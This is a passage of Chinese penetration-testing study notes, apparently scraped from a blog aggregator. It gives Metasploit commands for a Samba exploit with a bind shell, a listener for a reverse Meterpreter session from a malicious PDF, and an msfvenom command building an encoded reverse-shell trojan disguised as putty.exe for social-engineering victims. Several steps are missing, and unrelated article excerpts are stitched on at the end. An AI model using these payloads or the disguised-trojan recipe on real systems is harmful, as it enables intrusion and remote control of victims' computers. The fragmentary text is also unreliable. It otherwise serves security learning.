滲透測試中期

2022-08-15 19:36:17 字數 1938 閱讀 2127

網路服務攻擊:基於協議棧/服務漏洞

軟體漏洞攻擊:基於軟體漏洞

社會工程學攻擊:基於人性的弱點

web漏洞攻擊:網路攻擊細分領域

移動滲透攻擊:ios,android

無線滲透攻擊:wifi,藍芽

網路服務攻擊例項

環境的搭建:

一:ms-12-020

在執行上面的命令後,win2k3出現藍屏。

ms17-010(永恆之藍)

msf詳細方法鏈結

linux

samba:

實驗環境:metasploitble靶機 ,kali(設定payload實現後滲透攻擊)

攻擊**:

msf5 > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/bind_netcat msf5 exploit(multi/samba/usermap_script) > run

客戶端滲透攻擊

adobe閱讀器 - msf adobe45號exp

adobe reader 9.0

1建立乙個pdf文件

`2:建立監聽,接聽肉雞點選返回的會話鏈結

use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.92.158 set lport 8989(和pdf的檔案埠一樣) run

office 2016漏洞

社會工程學

製作乙個木馬(kali msf):

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.92.158 lport=8080 --platform win -a x86 -f exe -o putty.exe -e x86/shikata_.ga_nai -i8

設定監聽埠與上面的一致

當肉雞點選就會中招

滲透測試學習筆記 初識滲透測試

黑客活動 hacking 道德黑客 ethical hacking 白帽黑客 white hat hacking poc proof of concept,概念證明。pt penetration testing或者pen testing,滲透測試。apt advanced package tool,...

滲透測試 SSH

安全shell ssh 服務提供了對unix和windows系統的加密訪問,通過ssh可以進行命令列shell訪問 檔案訪問與安全ftp 以及簡單的vpn服務。由於使用明文的服務 如telnet 存在的弱點經常會被攻擊者利用來突破網路,所以ssh應運而生,主要用於實現對伺服器的加密訪問,以達到安全地...

滲透測試 Wget

第一次接觸到wget這個指令是在 網路安全評估 一書中的第179頁 wget r m nv 常用引數 m,mirror 等價於 r n l inf nr.nv,non verbose 關掉冗長模式,但不是安靜模式 a,accept list 可以接受的檔案型別 r,reject list 拒絕接受的...